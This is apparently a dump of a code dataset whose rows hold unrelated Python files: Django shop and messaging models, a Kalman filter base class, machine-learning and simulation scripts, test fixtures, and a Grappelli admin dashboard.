index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
983,700 | 5098e0f62db537db9751b5a60e9e49efec65f5e9 | from django.db import models
from django.contrib.auth.models import User
from django.core.exceptions import FieldDoesNotExist
from django.core.validators import MaxLengthValidator, MinLengthValidator
# Create your models here.
class Customer(models.Model):
user = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
name = models.CharField(max_length=200, null=True)
dob = models.DateField(max_length=8, null=True)
email = models.EmailField(max_length=254)
phone = models.CharField(max_length=200, null=True)
profile_pic = models.ImageField(null=True, blank=True)
bio = models.TextField(default="no bio...", max_length=300)
price = models.DecimalField(max_digits=7, decimal_places=2,null=True, blank=True)
def __str__(self):
return self.name
@property
def imageURL(self):
try:
url = self.image.url
except:
url = ''
return url
class Product(models.Model):
TYPE = (
('Bars' , 'Bars'),
('Drinks' , 'Drinks'),
('Powder' , 'Powder'),
('Tablets & Capsules' , 'Tablets & Capsules')
)
FLAVOR = (
('Chocolate' , 'Chocolate'),
('Snickerdoodle' , 'Snickerdoodle'),
('Cookies & Cream' , 'Cookies & Cream'),
('Strawberry' , 'Strawberry'),
('Vanilla' , 'Vanilla'),
('Fruits' , 'Fruits'),
)
MANUFACTURE = (
('Kabs' , 'Kabs'),
('First Nutrition' , 'First Nutrition'),
('Go Tamreen' , 'Go Tamreen'),
('Supplements Mall' , 'Supplements Mall'),
('Protinak' , 'Protinak'),
)
FOODTYPE = (
('Salad' , 'Salad'),
('Drinks' , 'Drinks'),
('Protin' , 'Protin'),
('Carbs' , 'Carbs'),
)
FOODSIZE = (
('20g' , '20g'),
('50g' , '50g'),
('80g' , '80g'),
('100g' , '100g'),
('150g' , '150g'),
('200g' , '200g'),
)
FOODMANUFACTURE = (
('Muscle Kitchen' , 'Muscle Kitchen'),
('Thefitbar' , 'Thefitbar'),
('Fit Food Factory' , 'Fit Food Factory'),
('Calories Healthy Food Resturant' , 'Calories Healthy Food Resturant'),
("OJ's - Super Fast Salads" , "OJ's - Super Fast Salads"),
)
user = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True)
name = models.CharField(max_length=200, null=True, blank=True)
price = models.DecimalField(max_digits=7, decimal_places=2, null=True, blank=True)
digital = models.BooleanField(default=False, null=True, blank=True)
image = models.ImageField(null=True, blank=True)
ptype = models.CharField(max_length=200, null=True, choices=TYPE)
flavor = models.CharField(max_length=200, null=True, choices=FLAVOR)
manufacture = models.CharField(max_length=200, null=True, choices=MANUFACTURE)
food_type = models.CharField(max_length=200, null=True, choices=FOODTYPE)
food_flavor = models.CharField(max_length=200, null=True, choices=FOODSIZE)
food_manufacture = models.CharField(max_length=200, null=True, choices=FOODMANUFACTURE)
description = models.TextField(null=True, blank=True)
rating = models.IntegerField(default=0, validators=[
MaxLengthValidator(5),
MinLengthValidator(0),
])
countInStock = models.IntegerField(null=True, blank=True, default=0)
createdAt = models.DateTimeField(auto_now_add=False, null=True, blank=True)
def __str__(self):
return self.name
@property
def imageURL(self):
try:
url = self.image.url
except:
url = ''
return url
class Review(models.Model):
product = models.ForeignKey(Product, null=True, on_delete=models.SET_NULL)
user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
name = models.CharField(max_length=50, null=True, blank=True)
rating = models.IntegerField(null=True, blank=True, default=0)
comment = models.TextField(null=True, blank=True)
def __str__(self):
return str(self.rating)
class Order(models.Model):
customer = models.ForeignKey(Customer, null=True, blank=True, on_delete=models.SET_NULL)
date_ordered = models.DateTimeField(auto_now_add=True)
complete = models.BooleanField(default=False)
transaction_id = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id)
@property
def shipping(self):
shipping = False
orderitems = self.orderitem_set.all()
for i in orderitems:
if i.product.digital == False:
shipping = True
return shipping
@property
def get_cart_total(self):
orderitems = self.orderitem_set.all()
total = sum([item.get_total for item in orderitems])
return total
@property
def get_cart_items(self):
orderitems = self.orderitem_set.all()
total = sum([item.quantity for item in orderitems])
return total
class OrderItem(models.Model):
product = models.ForeignKey(Product, null=True, on_delete=models.SET_NULL)
order = models.ForeignKey(Order, null=True, on_delete=models.SET_NULL)
quantity = models.IntegerField(default=0, null=True, blank=True)
date_added = models.DateTimeField(auto_now_add=True)
@property
def get_total(self):
total = self.product.price * self.quantity
return total
class ShippingAddress(models.Model):
customer = models.ForeignKey(Customer, null=True, on_delete=models.SET_NULL)
order = models.ForeignKey(Order, null=True, on_delete=models.SET_NULL)
address = models.CharField(null=True, max_length=200)
city = models.CharField(null=False, max_length=200)
zipcode = models.CharField(null=False, max_length=200)
date_added = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.address |
983,701 | 7531bd890cde3b44d6c0aa8395cbb3737f9082bb | # -*- coding: utf-8 -*-
# @Time : 2021/6/4 17:57
# @Author : dujun
# @File : conftest.py
# @describe: 项目脚本配置文件
import pytest
from ..testCaseManage.api_manage.App_addOrder import addOrder
from ..tools.dataBase import DataBase
@pytest.fixture(scope='session')
def mysql():
return DataBase()
@pytest.fixture(scope='session')
def addOrd_manege():
return addOrder()
# 用户账号数据
@pytest.fixture(scope='session')
def Account_data():
pass
# 信业帮
@pytest.fixture(scope='session')
def xinYe():
xinyebang = addOrder(phone='111111111111')
return xinyebang
|
983,702 | 424b2b75b0cce5be28a8dfc433e25cbfc237d30a | n = int(input('Digite um número inteiro: '))
dividido = n / 2
if dividido.is_integer():
print(f'O número \033[35m{n} \033[34mé par\033[m')
else:
print(f'O número \033[35m{n} \033[31mé ímpar\033[m')
#Também poderia ser feito assim: resultado = n % 2
#if resultado == 0: print('Esse número é par')
#else: print('Esse número é ímpar')
|
983,703 | 578728a1e96cb9f58994bdfca236d5ede63e77cb | from nn_wtf.neural_network_graph import NeuralNetworkGraph
from .util import MINIMAL_INPUT_SIZE, MINIMAL_OUTPUT_SIZE, MINIMAL_LAYER_GEOMETRY
import tensorflow as tf
import unittest
__author__ = 'Lene Preuss <lene.preuss@gmail.com>'
# pylint: disable=missing-docstring
class NeuralNetworkGraphTest(unittest.TestCase):
def test_init_runs(self):
NeuralNetworkGraph(MINIMAL_INPUT_SIZE, MINIMAL_LAYER_GEOMETRY, MINIMAL_OUTPUT_SIZE)
def test_init_fails_on_bad_layer_sizes(self):
with self.assertRaises(TypeError):
NeuralNetworkGraph(2, 2, 2)
def test_init_fails_if_last_layer_smaller_than_output_size(self):
with self.assertRaises(ValueError):
NeuralNetworkGraph(2, (2, 1), 2)
def test_build_neural_network_runs_only_once(self):
graph = self._create_minimal_graph()
with self.assertRaises(AssertionError):
graph._build_neural_network()
def test_build_neural_network_output(self):
graph = self._create_minimal_graph()
self.assertIsInstance(graph.output_layer(), tf.Tensor)
self.assertEqual(2, graph.output_layer().get_shape().ndims)
self.assertEqual(MINIMAL_OUTPUT_SIZE, int(graph.output_layer().get_shape()[1]))
self.assertEqual(len(graph.layers)-2, graph.num_hidden_layers)
self.assertEqual(len(MINIMAL_LAYER_GEOMETRY), graph.num_hidden_layers)
def test_build_neural_network_output_with_three_layers(self):
self._check_num_hidden_layers_for_input_is((4, 3, 2), 3)
def test_build_neural_network_output_with_last_layer_none(self):
self._check_num_hidden_layers_for_input_is((4, 3, None), 2)
def test_build_neural_network_output_with_middle_layer_none(self):
self._check_num_hidden_layers_for_input_is((4, None, 2), 2)
def _check_num_hidden_layers_for_input_is(self, definition, expected_size):
graph = NeuralNetworkGraph(MINIMAL_INPUT_SIZE, definition, MINIMAL_OUTPUT_SIZE)
self.assertEqual(expected_size, graph.num_hidden_layers)
def _create_minimal_graph(self):
return NeuralNetworkGraph(MINIMAL_INPUT_SIZE, MINIMAL_LAYER_GEOMETRY, MINIMAL_OUTPUT_SIZE)
|
983,704 | 684767ae293cfd6347ce0f34d9bd41e9306a3214 | import glob
import pandas as pd
import math
import numpy as np
import numbers
folder = 'test/results_size'
# cp = ['2p']
cp = ['1p', '2p', 'uniform']
# md = ['uniform', 'normal', 'reinit']
md = ['uniform']
mp = ['0.8', '0.2', '0.1', '0.05', '0.02', '0.01']
# mp = ['0.1']
ps = ['10', '30', '50', '70', '90', '110']
# ps = ['10']
# mult = ['1.0', '2.0', '4.0', '8.0', '16.0']
mult = ['1.0']
# fro = ['10', '20']
fro = ['10']
# to = ['100']
to = ['100']
# stats = ['avg', 'best', 'worst']
stats = ['best']
delim = "_"
rframe = pd.DataFrame(columns=['mp', 'ps', 'penalty'])
num = 0
for i in cp:
for j in md:
for k in mp:
for m in ps:
for mu in mult:
for f in fro:
for t in to:
# config = '2p_reinit_0.8_100'
config = i + delim + j + delim + k + delim + m + delim + mu + delim + f + delim + t
filelist = glob.glob(folder + '/' + config + '_SEED*')
cnt = 0
min = 1000000
if len(filelist) == 0: continue
print(config)
avg = 0
cnt = 0
for file in filelist:
dt = pd.read_csv(file + '\penalty_steps_best.txt', delim_whitespace=True)
if isinstance(dt['Penalty'].iloc[-1], numbers.Number):
avg += dt['Penalty'].iloc[-1]
cnt += 1
avg = avg / cnt;
rframe.loc[num] = [k, m, avg]
num += 1
print(avg)
rframe.to_csv('mp_ps_iso.csv', sep=' ') |
983,705 | 2369d4e6702b5d16144da964615e1b740805c6e5 | import crims.common.logger as logging
import datetime
# import cPickle as pickle
from django.db import models
from django.core.cache import cache
from django.conf import settings
from django.contrib.auth.models import User
from crims.gang.models import Gang
from crims.userprofile.models import UserProfile
class MsgManager(models.Manager):
def get_by_user(self, user, start=0, end=None, catalog='inbox'):
if catalog == 'inbox':
msgs = self.filter(receiver=user)
else:
msgs = self.filter(sender=user, is_deleted=False)
msgs = msgs.filter(is_spam=False, is_invite=False).order_by('-sent_at')
# TODO: load more in background
# if end is None:
# return msgs[start:start+settings.DEFAULT_MSGS_PER_PAGE]
# else:
# return msgs[start:end]
return msgs
def get_unread_count(self, user, last_id):
return self.filter(receiver=user, is_spam=False, is_invite=False, pk__gt=last_id).count()
def get_gang_unread_count(self, user, last_id):
return self.filter(receiver=user, is_spam=False, is_invite=False, is_gang=True, pk__gt=last_id).count()
class MsgSendManager(models.Manager):
def send_to(self, sender, receiver, msg):
try:
user = User.objects.get(username__iexact=receiver)
return self._send_to_user(sender, user, msg)
except User.DoesNotExist:
try:
gang = Gang.objects.get_by_name(name=receiver)
return self._send_to_gang(sender, gang, msg)
except Gang.DoesNotExist:
pass
logging.debug('No msg receiver %s' % receiver)
return False
def _send_to_user(self, sender, user, txt, gang=False):
msg = Msg()
msg.sender = sender
msg.receiver = user
if txt.startswith('@'):
msg.is_public = False
else:
msg.is_public = True
msg.content = txt
msg.is_gang = gang
msg.save()
logging.info('sent message from %s to %s' % (sender, user))
return True
def _send_to_gang(self, sender, gang, msg):
for member in gang.members:
user = User.objects.get(username__iexact=member)
self._send_to_user(sender, user, msg, gang=True)
return True
class Msg(models.Model):
"""Internal msg"""
sender = models.ForeignKey(User, related_name='sender')
receiver = models.ForeignKey(User, related_name='receiver')
content = models.CharField(max_length=255)
is_gang = models.BooleanField(default=False)
is_invite = models.BooleanField(default=False)
is_public = models.BooleanField(default=False)
is_notified = models.BooleanField(default=False)
is_spam = models.BooleanField(default=False)
is_deleted = models.BooleanField(default=False)
sent_at = models.DateTimeField(auto_now_add=True)
send = MsgSendManager()
objects = MsgManager()
class Meta:
db_table = 'msg'
def __unicode__(self):
return "Msg from %s to %s @ %s" % (self.sender, self.receiver, str(self.sent_at))
def as_spam(self):
self.is_spam = True
self.save()
|
983,706 | e31b90254ba3e6ed7df255eb91a528a9eb3264b2 | # @see: https://www.analyticsvidhya.com/blog/2017/08/introduction-to-multi-label-classification/
import scipy
from scipy.io import arff
import pandas as pd
data, meta = scipy.io.arff.loadarff('/Users/yangboz/git/AI-Challenge-RTVC/KerasExample/yeast/yeast-train.arff')
df = pd.DataFrame(data)
print(df.head())
# generate dataset
from sklearn.datasets import make_multilabel_classification
X, y = make_multilabel_classification(sparse=True, n_labels= 20,
return_indicator='sparse', allow_unlabeled= False)
# using binary relevance
from skmultilearn.problem_transform import BinaryRelevance
from sklearn.naive_bayes import GaussianNB
from sklearn.cross_validation import train_test_split
# initialize binary relevance multi-label classifier
# with a gaussian native bayes classifier
classifier = BinaryRelevance(GaussianNB())
# generate data set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)
# train
classifier.fit(X_train, y_train)
# predict
predictions = classifier.predict(X_test)
# calculate accuracy
from sklearn.metrics import accuracy_score
print(accuracy_score(y_test, predictions))
# using classifier chain
from skmultilearn.problem_transform import ClassifierChain
from sklearn.naive_bayes import GaussianNB
classifier = ClassifierChain(GaussianNB())
# train
classifier.fit(X_train, y_train)
# predict
predictions = classifier.predict(X_test)
print(accuracy_score(y_test, predictions))
# label powerset
from skmultilearn.problem_transform import LabelPowerset
# initialize Label Powerset multi-label classifier
# with a Gaussian naive bayes base classifier
classifier = LabelPowerset(GaussianNB())
# train
classifier.fit(X_train, y_train)
# predict
predictions = classifier.predict(X_test)
# calculate accuracy
print(accuracy_score(y_test, predictions))
# Adapted algorithm
from skmultilearn.adapt import MLkNN
classifier = MLkNN(k=20)
# train
classifier.fit(X_train, y_train)
# predict
predictions = classifier.predict(X_test)
# calculate accuracy
print(accuracy_score(y_test,predictions))
# https://medium.com/coinmonks/multi-label-classification-blog-tags-prediction-using-nlp-b0b5ee6686fc
from sklearn.naive_bayes import MultinomialNB
from sklearn.multiclass import OneVsRestClassifier
from sklearn.metrics import accuracy_score
classifier = OneVsRestClassifier(MultinomialNB())
# train
classifier.fit(X_train, y_train)
# predict
predictions = classifier.predict(X_test)
# calculate accuracy
print(accuracy_score(y_test, predictions))
|
983,707 | 4e10924d6ba56c1ff15139f0dbc342abc03000aa | import sensor,packet,AP,event
def packet_generation(STA_list,location,speed,sp_type,arg): #generate packe according to the alarm spreading model
# speed should be in unit of m/s
import math,random
assert sp_type=="All" or sp_type=="Exp" or sp_type=="Sq"
packet_generation_events=[]
counter=0
x=location[0]
y=location[1]
for each in STA_list: #calculate the packet arrival time
#print(each.AID)
distance=math.sqrt((each.x-x)**2+(each.y-y)**2)
if sp_type=="All":
new_event=event.event("packet arrival",start_time=(distance/speed*10**6))
new_event.register_STA(each)
packet_generation_events.append(new_event)
counter+=1
# timer.register_event(new_event)
if sp_type=="Exp":
a=arg
probability=math.exp(-a*distance)
if random.random()<=probability:
new_event=event.event("packet arrival",start_time=(distance/speed*10**6))
new_event.register_STA(each)
packet_generation_events.append(new_event)
counter+=1
# timer.register_event(new_event)
if sp_type=="Sq":
d_max=arg
if distance<d_max:
probability=math.sqrt(d_max**2-distance**2)
else:
probability=0
if random.random()<=probability:
new_event=event.event("packet arrival",start_time=(distance/speed*10**6))
new_event.register_STA(each)
packet_generation_events.append(new_event)
counter+=1
print("packet amount="+str(counter))
import time
# time.sleep(1)
return packet_generation_events,counter
def STA_generation(amount,radius,RTS_enable,CWmin,CWmax,system_AP):
STA_list=[]
import math,random
for i in range(1,amount+1):
alpha=random.random()*2*math.pi
r=math.sqrt(random.random())*radius
x=r*math.cos(alpha)
y=r*math.sin(alpha)
STA_list.append(sensor.sensor(i,CWmin,CWmax,[x,y],RTS_enable,False,system_AP))
return STA_list
radius=1000
RTS_enable=True
CWmin=16
CWmax=16*2^5
import math,random
alpha=random.random()*2*math.pi
r=math.sqrt(random.random())*radius
x=r*math.cos(alpha)
y=r*math.sin(alpha)
print(x,y)
amount=500 # the number of STAs
system_AP=AP.AP([0,0],STA_list=[])
STA_list=STA_generation(amount,radius,RTS_enable,CWmin,CWmax,system_AP)
for d_max in range(400,1601,300): # the radius of the affected area
# amount=100 #amount of STAs
print(amount,d_max)
file=open("station_list_amount="+str(amount)+"_d_max="+str(d_max)+".pkl","wb")
system_AP.STA_list=STA_list
import pickle
pickle.dump(amount,file)
for each in STA_list:
pickle.dump(each.x,file)
pickle.dump(each.y,file)
file.close()
file=open("packet_events_amount="+str(amount)+"_d_max="+str(d_max)+".pkl","wb")
[packet_events,packet_amount]=packet_generation(STA_list,[x,y],4000,"Sq",d_max)
# print(amount)
pickle.dump(packet_amount,file)
for each in packet_events:
pickle.dump(each.time,file)
pickle.dump(each.STA_list[0].AID,file)
file.close() |
983,708 | 20cac9c19aaa8924d5a0a65b0874b4318877867f | import turtle
t=turtle.Turtle()
t.shape('turtle')
t.width(3)
t.color('blue')
for i in range(1,300):
angle=5
t.forward(angle*3.142/180*i)
t.left(angle)
|
983,709 | 33260b531638434f3893262cf082051c327a6d8d | """ Solution for exercise 8.12 from Think Python.
Author: Aliesha Garrett
"""
def rotate_word(s,i):
""" 'Rotates' each letter in a word 'i' places. (Rotating a letter is shifting through the alphabet, wrapping around to the beginning again if necessary.)
i: integer
s: string
"""
word=''
if abs(i) > 26:
i=i%26
for char in s:
old=ord(char)
new=old+i
if old < 65:
fixed=old
elif old > 122:
fixed=old
elif 90 < old < 97:
fixed=old
elif 65 < old < 90:
if new > 90:
fixed=new-26
elif new < 65:
fixed=new+26
else:
fixed=new
elif 97 < old < 122:
if new > 122:
fixed=new-26
elif new < 97:
fixed=new+26
else:
fixed=new
rotated=chr(fixed)
word=word+rotated
return word
print rotate_word('cheer',7)
print rotate_word('melon',-10)
print rotate_word('sleep',9)
|
983,710 | 498b9a40d85aed5d74add84899148811041d22d2 | """Private module; avoid importing from directly.
"""
import abc
import fannypack as fp
import torch
from overrides import overrides
from .. import types
from ._dynamics_model import DynamicsModel
from ._filter import Filter
from ._kalman_filter_measurement_model import KalmanFilterMeasurementModel
class KalmanFilterBase(Filter, abc.ABC):
"""Base class for a generic Kalman-style filter. Parameterizes beliefs with a mean
and covariance.
Subclasses should override `_predict_step()` and `_update_step()`.
"""
def __init__(
self,
*,
dynamics_model: DynamicsModel,
measurement_model: KalmanFilterMeasurementModel,
**unused_kwargs, # For type checking
):
super().__init__(state_dim=dynamics_model.state_dim)
# Check submodule consistency
assert isinstance(dynamics_model, DynamicsModel)
assert isinstance(measurement_model, KalmanFilterMeasurementModel)
# Assign submodules
self.dynamics_model = dynamics_model
"""torchfilter.base.DynamicsModel: Forward model."""
self.measurement_model = measurement_model
"""torchfilter.base.KalmanFilterMeasurementModel: Measurement model."""
# Protected attributes for posterior distribution: these should be accessed
# through the public `.belief_mean` and `.belief_covariance` properties
#
# `_belief_covariance` is unused for square-root filters
self._belief_mean: torch.Tensor
self._belief_covariance: torch.Tensor
# Throw an error if our filter is used before `.initialize_beliefs()` is called
self._initialized = False
@overrides
def forward(
self,
*,
observations: types.ObservationsTorch,
controls: types.ControlsTorch,
) -> types.StatesTorch:
"""Kalman filter forward pass, single timestep.
Args:
observations (dict or torch.Tensor): Observation inputs. Should be either a
dict of tensors or tensor of shape `(N, ...)`.
controls (dict or torch.Tensor): Control inputs. Should be either a dict of
tensors or tensor of shape `(N, ...)`.
Returns:
torch.Tensor: Predicted state for each batch element. Shape should
be `(N, state_dim).`
"""
# Check initialization
assert self._initialized, "Kalman filter not initialized!"
# Validate inputs
N, state_dim = self.belief_mean.shape
assert fp.utils.SliceWrapper(observations).shape[0] == N
assert fp.utils.SliceWrapper(controls).shape[0] == N
# Predict step
self._predict_step(controls=controls)
# Update step
self._update_step(observations=observations)
# Return mean
return self.belief_mean
@overrides
def initialize_beliefs(
self, *, mean: types.StatesTorch, covariance: types.CovarianceTorch
) -> None:
"""Set filter belief to a given mean and covariance.
Args:
mean (torch.Tensor): Mean of belief. Shape should be `(N, state_dim)`.
covariance (torch.Tensor): Covariance of belief. Shape should be
`(N, state_dim, state_dim)`.
"""
N = mean.shape[0]
assert mean.shape == (N, self.state_dim)
assert covariance.shape == (N, self.state_dim, self.state_dim)
self.belief_mean = mean
self.belief_covariance = covariance
self._initialized = True
@property
def belief_mean(self) -> types.StatesTorch:
"""Posterior mean. Shape should be `(N, state_dim)`."""
return self._belief_mean
@belief_mean.setter
def belief_mean(self, mean: types.StatesTorch):
self._belief_mean = mean
@property
def belief_covariance(self) -> types.CovarianceTorch:
"""Posterior covariance. Shape should be `(N, state_dim, state_dim)`."""
return self._belief_covariance
@belief_covariance.setter
def belief_covariance(self, covariance: types.CovarianceTorch):
self._belief_covariance = covariance
@abc.abstractmethod
def _predict_step(self, *, controls: types.ControlsTorch) -> None:
r"""Kalman filter predict step.
Computes $\mu_{t | t - 1}$, $\Sigma_{t | t - 1}$ from $\mu_{t - 1 | t - 1}$,
$\Sigma_{t - 1 | t - 1}$.
Keyword Args:
controls (dict or torch.Tensor): Control inputs.
"""
@abc.abstractmethod
def _update_step(self, *, observations: types.ObservationsTorch) -> None:
r"""Kalman filter measurement update step.
Nominally, computes $\mu_{t | t}$, $\Sigma_{t | t}$ from $\mu_{t | t - 1}$,
$\Sigma_{t | t - 1}$.
Updates `self.belief_mean` and `self.belief_covariance`.
Keyword Args:
observations (dict or torch.Tensor): Observation inputs.
"""
|
983,711 | 556ec8c3287edaa1dfec4deb37ea0b17d31f80f1 | import numpy as np
import matplotlib.pyplot as plt
def pdf(costh, P_mu):
# define our probability density function
return 0.5 * (1.0 - 1.0 / 3.0 * P_mu * costh)
def acc_rej(N_measurements, P_mu):
x = np.random.uniform(-1.0, 1.0, size=N_measurements)
x_axis = np.linspace(-1.0, 1.0, 1000)
fmax = np.amax(pdf(x_axis, P_mu)) # find the maximum of the function
u = np.random.uniform(0, fmax, size=N_measurements)
# we use a mask in order to reject the values we don't want
data_pdf = x[u < pdf(x, P_mu)]
return data_pdf
P_mu = 0.5
N_measurements_max = 10000000
P_mu_est=np.array([])
data_N_measurements=np.array([])
for N_measurements in np.arange(1, N_measurements_max+10000, 10000):
data_pdf = acc_rej(N_measurements, P_mu)
mean = np.mean(data_pdf)
P_mu_est = np.append(P_mu_est,-9. * mean)
data_N_measurements = np.append(data_N_measurements, N_measurements)
print(N_measurements)
np.save("P_mu_est", P_mu_est)
np.save("data_N_measurements", data_N_measurements)
P_mu_est = np.load("P_mu_est.npy")
data_N_measurements = np.load("data_N_measurements.npy")
plt.plot(data_N_measurements, P_mu_est, "k", linewidth=0.5, label=r"$\hat{P}_\mu$")
plt.plot([1, N_measurements_max], [P_mu, P_mu], "orange", linestyle='-', linewidth=1.0, label=r"$P_\mu$")
plt.xlabel(r"$N_{events}$")
plt.ylabel(r'$\hat{P}_\mu}$')
plt.xlim(1, N_measurements_max)
plt.ylim(0.46, 0.54)
plt.legend(loc="best")
leg = plt.legend()
leg.get_frame().set_edgecolor('black')
# plt.savefig(r"C:\Users\Aleix López\Desktop\acc_rej.jpg")
plt.show()
|
983,712 | a41891c197442a56ffabc1820a890b3360d92660 | # -*- coding: utf-8 -*-
from radish import before
@before.each_scenario
def init_numbers(scenario):
scenario.context.users = []
scenario.context.database = lambda: None
setattr(scenario.context.database, "users", [])
scenario.context.database.users = []
|
983,713 | 14ad451ea530b28f3a39a718d29a4db2dcbdcee2 | from sys import stdin
from math import floor
def solution(N, M, K, balls):
DELTA = (-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)
balls = list(map(lambda x: (x[0] - 1, x[1] - 1, *x[2:]), balls))
for _ in range(K):
poses = {}
for x, y, m, s, d in balls:
dx, dy = DELTA[d]
nx, ny = (x + s * dx) % N, (y + s * dy) % N
poses.setdefault((nx, ny), []).append((m, s, d))
new_balls = []
for (x, y), vals in poses.items():
if len(vals) == 1:
new_balls.append((x, y, *vals[0]))
continue
nm, ns, nd = 0, 0, []
for m, s, d in vals:
nm += m
ns += s
nd.append(d % 2)
nm = floor(nm / 5)
ns = floor(ns / len(vals))
nd = (0, 2, 4, 6) if all(d == nd[0] for d in nd) else (1, 3, 5, 7)
if nm != 0:
for d in nd:
new_balls.append((x, y, nm, ns, d))
balls = new_balls
return sum(map(lambda x: x[2], balls))
lexer = lambda: list(map(int, stdin.readline().strip().split(' ')))
N, M, K = lexer()
balls = [lexer() for _ in range(M)]
print(solution(N, M, K, balls))
|
983,714 | dbdc7405ce3109ca374683f4c7057c50a6cb257f | from matplotlib import animation
import matplotlib.pyplot as plt
import gym
import pyglet
import time
import numpy as np
"""
Ensure you have imagemagick installed with
sudo apt-get install imagemagick
Open file in CLI with:
xgd-open <filelname>
"""
#class RenderActionWrapper(gym.Wrappers):
def save_frames_as_gif(frames, path='./', filename='gym_animation.gif'):
#Mess with this to change frame size
fig = plt.figure(figsize=(frames[0].shape[1] / 72.0, frames[0].shape[0] / 72.0), dpi=72)
plt.axis('off')
fig.tight_layout()
patch = plt.imshow(frames[0])
plt.show()
#animate = lambda i: patch.set_data(frames[i])
#gif = animation.FuncAnimation(plt.gcf(), animate, frames = len(frames), interval=50)
#gif.save(path + filename, writer='imagemagick', fps=20)
#Make gym env
env = gym.make('Acrobot-v1')
#Run the env
observation = env.reset()
frames = []
score_label = pyglet.text.Label('0000', font_size=36,
x=20, y=480, anchor_x='left', anchor_y='top',
color=(255,63,63,255))
for t in range(10):
action = env.action_space.sample()
#Render to frames buffer
time.sleep(.1)
env.render(mode="rgb_array")
score_label.text = "Action: {: d}".format(action-1)
score_label.draw()
#pyglet.image.get_buffer_manager().get_color_buffer().get_image_data()
#pyglet.gl.glClearColor((36+1.0)/256, (72+1.0)/256, (132+1.0)/256,1) #244884
env.viewer.window.flip()
arr = np.fromstring(pyglet.image.get_buffer_manager().get_color_buffer().get_image_data().get_data(), dtype=np.uint8, sep='')
arr = arr.reshape(env.viewer.height, env.viewer.width, 4)[::-1, :, 0:3]
print(arr.shape)
frames.append(arr)
#for i in range(arr.shape[0]):
# for j in range(arr.shape[1]):
# if (arr[i,j,:] == np.array([255,255,255])).all():
# arr[i,j,:] = np.array([36,72,132])
_, _, done, _ = env.step(action)
if done:
break
env.close()
save_frames_as_gif(frames[1:])
|
983,715 | 98814b16cb6911baf1f5b2cae5f2742149e51bf7 | #!/usr/bin/python3
"""Module for task 7 - Load, add, save"""
from sys import argv
import os
import json
save_to_json_file = __import__('5-save_to_json_file').save_to_json_file
load_from_json_file = __import__('6-load_from_json_file').load_from_json_file
if os.path.isfile("add_item.json"):
my_list = load_from_json_file("add_item.json")
else:
my_list = []
for arg in range(1, len(argv)):
my_list.append(argv[arg])
save_to_json_file(my_list, "add_item.json")
|
983,716 | 824a406c62ac250cbdfc7dbef3d35cf6c3c76340 | # -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from common.models import SiteTemplate
from grappelli.dashboard import modules, Dashboard
from grappelli.dashboard.utils import get_admin_site_name
class CustomIndexDashboard(Dashboard):
"""
Custom index dashboard for www.
"""
template = 'frontend/admin_dashboard.html'
def init_with_context(self, context):
site_name = get_admin_site_name(context)
self.children.append(modules.ModelList(
title=u'Оператору',
column=1,
models=(
'frontend.models.ShopOrder',
'frontend.models.FastOrder'
)
))
self.children.append(modules.ModelList(
title=u'Контент-менеджеру',
column=1,
models=(
'frontend.models.News',
'frontend.models.SimplePage',
'frontend.models.Product',
'frontend.models.ProductVariant',
'frontend.models.Slider',
'frontend.models.Category',
)
))
self.children.append(modules.ModelList(
title=u'Администратору',
column=1,
models=(
'frontend.models.City',
'frontend.models.Discount',
'frontend.models.DeliveryType',
'frontend.models.DeliveryTime',
'frontend.models.PaymentType',
'frontend.models.OrderStatus',
'frontend.models.Settings',
'frontend.models.LinkedSite',
# 'django.contrib.auth.models.User',
# 'frontend.models.UserProfile'
)
))
self.children.append(modules.ModelList(
title=u'Программисту',
column=1,
models=(
# 'frontend.models.MailTemplate',
# 'vest.common.models.*',
'common.models.SiteTemplate',
'common.models.SiteSettings',
'django.contrib.*'
)
))
if context['request'].user.is_superuser:
self.children.append(modules.LinkList(
u'Спец. функции',
column=2,
children=[
{
'title': u'Сформировать Yml',
'url': reverse('frontend:view_yml_gen'),
'external': False
},
{
'title': u'Сформировать Sitemap',
'url': reverse('frontend:view_sitemap_gen'),
'external': False
},
{
'title': u'Перенести шаблоны в базу',
'url': reverse('frontend:view_template_to_db'),
'external': False
},
{
'title': u'Запустить анти-конкурента',
'url': reverse('frontend:view_price_set'),
'external': False
},
]
))
self.children.append(modules.LinkList(
u'Инструкции',
column=2,
children=[
{
'title': u'Работа с шаблонами',
'url': '/media/video/template.swf',
'external': False,
},
{
'title': u'Работа с простыми страницами',
'url': r'/media/video/simple_page.swf',
'external': False
},
{
'title': u'Добавление текста в шаблон',
'url': r'/media/video/add_text.swf',
'external': False
},
{
'title': u'Привязка нескольких страниц к одному url',
'url': r'/media/video/multiple_page.swf',
'external': False
}
]
))
# append a recent actions module
self.children.append(modules.RecentActions(
_('Recent Actions'),
limit=5,
collapsible=False,
column=2,
))
# # append a group for "Administration" & "Applications"
# self.children.append(modules.Group(
# _('Group: Administration & Applications'),
# column=1,
# collapsible=True,
# children = [
# modules.AppList(
# _('Administration'),
# column=1,
# collapsible=False,
# models=('django.contrib.*',),
# ),
# modules.AppList(
# _('Applications'),
# column=1,
# css_classes=('collapse closed',),
# exclude=('django.contrib.*',),
# )
# ]
# ))
#
# # append an app list module for "Applications"
# self.children.append(modules.AppList(
# _('AppList: Applications'),
# collapsible=True,
# column=1,
# css_classes=('collapse closed',),
# exclude=('django.contrib.*',),
# ))
#
# # append an app list module for "Administration"
# self.children.append(modules.ModelList(
# _('ModelList: Administration'),
# column=1,
# collapsible=False,
# models=('django.contrib.*',),
# ))
# append a recent actions module
|
983,717 | a529cc70c5d43d3248c9f0a0dd1387e13545002b | import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def plot_act(i=1.0, actfunc=lambda x: x):
ws = np.arange(-0.5, 0.5, 0.05)
bs = np.arange(-0.5, 0.5, 0.05)
X, Y = np.meshgrid(ws, bs)
os = np.array([actfunc(tf.constant(w*i + b)).eval(session=sess) \
for w,b in zip(np.ravel(X), np.ravel(Y))])
Z = os.reshape(X.shape)
